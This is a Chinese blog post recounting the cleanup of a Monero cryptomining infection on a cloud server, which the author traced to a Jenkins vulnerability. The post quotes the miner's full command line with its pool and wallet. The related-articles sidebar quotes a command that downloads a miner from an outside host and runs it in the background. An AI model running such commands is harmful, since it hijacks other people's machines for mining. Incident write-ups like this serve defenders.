云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --max-cpu-usage 80 --cpu-priority 3

最新推荐文章于 2024-04-17 07:28:57 发布
最新推荐文章于 2024-04-17 07:28:57 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: Linux Shell 软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo_qiangqiang/article/details/103546038
版权
Linux 同时被 3 个专栏收录
231 篇文章 9 订阅
订阅专栏
软件
123 篇文章 1 订阅
订阅专栏
Shell
49 篇文章 0 订阅
订阅专栏

云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 80 --cpu-priority 3

今天登陆了共有云主机发现主机CPU使用率很高,top命令查看,发现有两个trace进程占用CPU超级高。
通过ps -ef|grep trace查看到两条trace进程,这里截取其中一条如下:

./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url monerohash.com:2222  --user 45F63UPYbAE1opWW9eAyErgx299LywuTKgWCRzcyW7mZ3RSM9WdCQT7gTMPzq2ciLATArw85aByiga7irig4E4Eo2hGvVBN --pass x --keepalive

通过进程确认不是我们需要的正常进程,
排查这两个进程的父进程,
通过pstree -up发现这两个进程的父进程是jenkins下控制的两个脚本进程,
再通过进程号找到/tmp路径下的两个脚本:
在这里插入图片描述

执行脚本查看trace的进程

ps -ef | grep trace

在这里插入图片描述

得到进程id 查看对应的目录

ls -l /proc/418/exe

确定是挖矿病毒,查看进程的执行文件链接到哪里,发现是jenkins的工作目录,最后结果发现是jenkins的漏洞导致自动创建CI计划,进行启动挖矿脚本

将两个脚本删除,再将两个trace进程kill掉,CPU就降下来了。

执行htop命令,发现cpu已经降下来了
在这里插入图片描述

徊忆羽菲
关注
专栏目录
shell实例手册
yonggeit的博客
05-27 6087
shell实例手册 1文件{ touch file # 创建空白文件 rm -rf 目录名 # 不提示删除非空目录(-r:递归删除 -f强制) dos2unix # windows文本转linux文本 unix2dos # linux文本转windows文本 enca filename ...
【4. BSP开发指南 - [4.3. 驱动开发指南]】
Sugar_wolf的博客
06-13 752
4. BSP开发指南 - [4.3. 驱动开发指南]】
trace/trace2命令
weixin_33916256的博客
03-06 341
send REPLICAT REP_1B trace2 /home/oracle/trace2.log send REPLICAT REP_1B trace /home/oracle/trace.log send REPLICAT REP_1B trace2 of send REPLICAT REP_1B trace off  
记录一次watchdog被挖矿
buzenmedi的专栏
06-29 672
突然发现机器cpu,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
《应急响应》记一次“XMR门罗币挖矿木马病毒”处置
1
11-03 2478
故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。
阿里云挖矿./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 10
fuleigang的专栏
03-16 1193
根据相关法规、政策的规定及监管部门的要求,阿里云禁止客户利用阿里云服务直接或间接地从事与虚拟货币相关的业务及行为,包括但不限于虚拟货币的勘探(挖矿)、登记、交易、清算、结算等,如用户违反上述规定,阿里云有权立即停止提供所有服务。删除这个目录,发现过一会又出现,根据目录看应该是jekins程序导致的,进入jekins配置,发现异常流水线一直在构建,怪不得杀进程删文件都没用,一直在构建一直产生新的,将漏洞程序删除。杀完后发现还是异常,怀疑可能是定时任务,继续杀定时任务,发现没用,继续跟进PId查找原因,
CPU使用率问题排查及Linux之top命令用法详解_top命令查看线程cpu
最新发布
m0_60388261的博客
04-17 2243
上述最后提到的缓冲的交换区总量,这里解释一下,所谓缓冲的交换区总量,即内存中的内容被换出到交换区,而后又被换入到内存,但使用过的交换区尚未被覆盖,该数值即为这些内容已存在于内存中的交换区的大小。的使用资源排序显示 N:以pid排序显示 T:由进程使用的时间累计排序显示 k:给某一个pid一个信号。-b:以批次的方式执行top。top命令经常用来监控linux的系统状况,是常用的性能分析工具,能够实时显示系统中各个进程的资源占用情况。:显示在top当中可以输入的命令 P:以CPU的使用资源排序显示 M:以。
usage.txt-2
huhuoyun的专栏
02-15 1443
局域网共享喇叭 ---------------- $>paprefs #PulseAudio Preferences. $>pavucontrol #Volume Control. 终端快捷键 ---------------- SHIFT+CTRL+v #终端复制. SHIFT+CTRL+c #终端粘贴. SHIFT+CTRL+t #新建标签页. SHIFT+.
linux常用命令-part3
热门推荐
chinayuan的专栏
05-01 2万+
中文怎么发音 Ubuntu 有奔头,乌版图 Fedora 费德勒,菲朵拉 Debian 迪扁,德槟 CentOS 桑托斯 森头斯       Linux发展历史: 1) RedHat ---> 1.RedHat                2.CentOS                3.Fedora  桌面图形系统        rpm, yum 命令 2)
linux常用命令-part2
chinayuan的专栏
05-01 2万+
Ubuntu,Fedora,Debian,CentOS中文怎么发音 有奔头, 费德勒, 迪扁, 桑托斯。 乌版图 菲朵拉 德槟 森头斯 ================================ 使用find和wc命令统计代码行数 ================================ wc -l `find . -name "*.js" | xargs`
云主机cpu 和负载100%的解决之一
阿杰么的博客
11-23 325
linux中cpu100%的其中一个原因
ZEPH教程+RandomX优化
qq_44946696的博客
03-20 1152
xmrig.exe -u -p yjsnpi -o hk.zephyr.herominers.com -a rx/0 -k -t 32 打开策略组编辑器,依次打开`计算机配置 > Windows设置 > 安全设置 > 本地策略 > 用户权限分配`,找到`锁定内存页`,填入`Everyone`,点击“确定”应用更改后重启即可。 重启后右键`xmrig.exe`,点击`属性 > 兼容性`,勾选“以管理员身份运行此程序”
记录一次redis被挖矿 ./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B
dingchaochao_9110的博客
09-22 1121
今天在用系统测试,然后又双叒叕运行异常了,看到后台又是redis连接超时,已经连着好几天都是这个错了,然后登录portainer查看,进入redis容器输入redis-cli竟然也是连接超时,无意中点了看了下stats,有一行命令是./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B,很奇怪的命令,问了开发群好像也没人敲这行命令,于是赶忙先重启了redis,然后去找度娘,历经艰辛总算找到有个大哥的博客:腾讯云服务
【Linux】系统优化
屎蛋的铲屎官
07-12 274
文章目录1.安装chrome无法启动 1.安装chrome无法启动 [0807/144244.712736:FATAL:nss_util.cc(627)] NSS_VersionCheck("3.26") failed. NSS >= 3.26 is required Please upgrade to the latest NSS, and if you still get this er...
云主机
真的还想再活几十年
09-14 219
记录 CentOS 6.8 64位下 apache 和 mysql 服务相关: apache service httpd start 启动service httpd restart 重新启动service httpd stop 停止服务mysql service httpd start 启动service httpd restart 重新启动service httpd stop 停止服务
云主机发现主机CPU使用率:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 80 --cpu-p
kewen_123的博客
06-10 514
今天登陆了共有云主机发现主机CPU使用率,top命令查看,发现有两个trace进程占用CPU超级。 通过ps -ef|grep trace查看到两条trace进程,这里截取其中一条如下:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url monerohash.com:2222 --user 45F.
关于linux遭受挖矿病毒,伪装为trace
麋鹿迷了路~
01-04 2828
前几天两台线上的centos7遭遇了挖矿病毒 每天的cpu都是跑满的状态 进程名为:trace 实际文件名为:xmrig 捋一下处理流程: 看看一下进程号。然后 ls -l /proc/进程号/exe 看一下启动程序的路径 然后发现在/home下 home下有程序及启动的脚本 然后把程序及脚本取消掉执行权限 就放下了。 结果第二天他还跑起来了,之后我把文件删除,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值